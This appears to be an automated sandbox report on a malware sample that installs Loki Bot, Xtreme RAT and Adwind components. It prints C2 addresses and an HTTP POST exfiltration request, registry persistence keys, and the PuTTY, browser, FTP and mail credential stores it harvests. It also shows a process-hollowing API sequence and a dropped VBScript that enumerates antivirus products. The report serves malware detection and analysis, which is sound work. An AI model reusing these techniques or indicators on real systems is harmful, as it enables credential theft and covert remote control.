Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49248 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49249 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49250 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49253 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49255 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49260 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49266 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49270 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49275 -> 185.208.211.131:2379
Contains functionality to upload files via FTP
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle | 3_2_00C87918
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle | 3_1_00C87918
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle | 5_2_00C87918
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle | 6_2_00C87918
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle | 15_2_00C87918
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle | 15_1_00C87918
Contains functionality to download additional files from the internet
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C837C0 DeleteUrlCacheEntryW,DeleteFileW,URLDownloadToFileW | 3_2_00C837C0
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: fashionstune.com
Posts data to webserver
Source: unknown | HTTP traffic detected:
    POST /old/inc/img/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: fashionstune.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: F85E9006
    Content-Length: 186
    Connection: close
Urls found in memory or binary data
Source: server.exe, svchost.exe, iexplore.exe, explorer.exe, Server.exe | String found in binary or memory: http://

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Users\user\AppData\Local\Temp\server.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKLM
Creates an undocumented autostart registry key
Source: C:\Users\user\AppData\Local\Temp\server.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA} StubPath
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\sxz.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run sxz.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKLM
Source: C:\Users\user\AppData\Local\Temp\server.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run HKCU
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run 358saxio.exe
Creates an autostart registry key
Source: C:\Users\user\Desktop\sxz.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run sxz.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKLM
Source: C:\Users\user\AppData\Local\Temp\server.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run HKCU
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run 358saxio.exe

Remote Access Functionality:

ADWIND Rat detected
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Dropped file:
    Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
    Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")
    For Each objItem in colItems
        With objItem
            WScript.Echo "{""AV"":""" & .displayName & """}"
        End With
    Next
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Dropped file:
    Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
    Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
    For Each objItem in colItems
        With objItem
            WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
        End With
    Next
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe | Dropped file:
    Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
    Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")
    For Each objItem in colItems
        With objItem
            WScript.Echo "{""AV"":""" & .displayName & """}"
        End With
    Next
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe | Dropped file:
    Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
    Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
    For Each objItem in colItems
        With objItem
            WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
        End With
    Next
Java source code contains strings found in CrossRAT
Source: uroi.jar.2.dr | Suspicious string: operational.JRat (in operational/Jrat.java)
Source: _0.71076688945376033550400146700531635.class.4.dr | Suspicious string: operational.JRat (in operational/Jrat.java)

Stealing of Sensitive Information:

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\SimonTatham\PuTTY\Sessions
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\Martin Prikryl
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: HKEY_USERS\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: HKEY_USERS\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: HKEY_USERS\Software\Far\Plugins\FTP\Hosts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: HKEY_USERS\Software\FlashPeak\BlazeFtp\Settings
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Searches for user specific document files
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\Documents

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\explorer.exe | Executable created and started: C:\Windows\InstallDir\Server.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
Drops PE files
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
Source: C:\Users\user\Desktop\sxz.exe | File created: C:\Users\user~1\AppData\Local\Temp\server.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
Source: C:\Windows\InstallDir\Server.exe | File created: C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_es2.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Skype.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcr100.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Windows\InstallDir\Server.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcr100.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\kcms.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dllJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Windows\InstallDir\Server.exeJump to dropped file
Creates license or readme fileShow sources
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C83D8C LoadLibraryA,GetProcAddress,FreeLibrary
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C82D48 push 00C82D74h; ret 3_2_00C82D6C
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C82D46 push 00C82D74h; ret 3_2_00C82D6C
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C83420 push 00C8349Fh; ret 3_2_00C83497
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C879DC push 00C87A65h; ret 3_2_00C87A5D
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C82924 push 00C82950h; ret 3_2_00C82948
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C880DC push 00C88108h; ret 3_2_00C88100
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C82548 push 00C82580h; ret 3_2_00C82578
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C88898 push 00C888C4h; ret 3_2_00C888BC
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C83F94 push 00C83FC0h; ret 3_2_00C83FB8
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8258C push 00C825B8h; ret 3_2_00C825B0
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C823A4 push 00C823DEh; ret 3_2_00C823D6
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C879DA push 00C87A65h; ret 3_2_00C87A5D
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C848DC push 00C84908h; ret 3_2_00C84900
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C87DD0 push 00C87E13h; ret 3_2_00C87E0B
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C84578 push 00C845DCh; ret 3_2_00C845D4
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C82AD8 push 00C82B04h; ret 3_2_00C82AFC
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8295C push 00C82988h; ret 3_2_00C82980
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C879A0 push 00C879D8h; ret 3_2_00C879D0
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8503C push 00C85068h; ret 3_2_00C85060
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C84034 push 00C84060h; ret 3_2_00C84058
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C89AA8 push 00C89AECh; ret 3_2_00C89AE4
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C83C88 push 00C83CC0h; ret 3_2_00C83CB8
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C82D48 push 00C82D74h; ret 3_1_00C82D6C
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C82D46 push 00C82D74h; ret 3_1_00C82D6C
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C83420 push 00C8349Fh; ret 3_1_00C83497
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C879DC push 00C87A65h; ret 3_1_00C87A5D
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C82924 push 00C82950h; ret 3_1_00C82948
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C880DC push 00C88108h; ret 3_1_00C88100
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C82548 push 00C82580h; ret 3_1_00C82578
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C88898 push 00C888C4h; ret 3_1_00C888BC
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C83F94 push 00C83FC0h; ret 3_1_00C83FB8
Sample is packed with UPX
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1

Spreading:

Enumerates the file system
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00405FAC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C835B0 FindFirstFileW,CloseHandle

System Summary:

Installs Xtreme RAT
Source: C:\Program Files\Internet Explorer\iexplore.exe | Window created: XtremeKeylogger
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\server.exe | File created: C:\Windows\InstallDir\
Creates mutexes
Source: C:\Windows\InstallDir\Server.exe | Mutant created: \Sessions\1\BaseNamedObjects\XTREMEUPDATE
Source: C:\Windows\System32\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\DSma9HnKaPERSIST
Source: C:\Windows\System32\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\DSma9HnKaEXIT
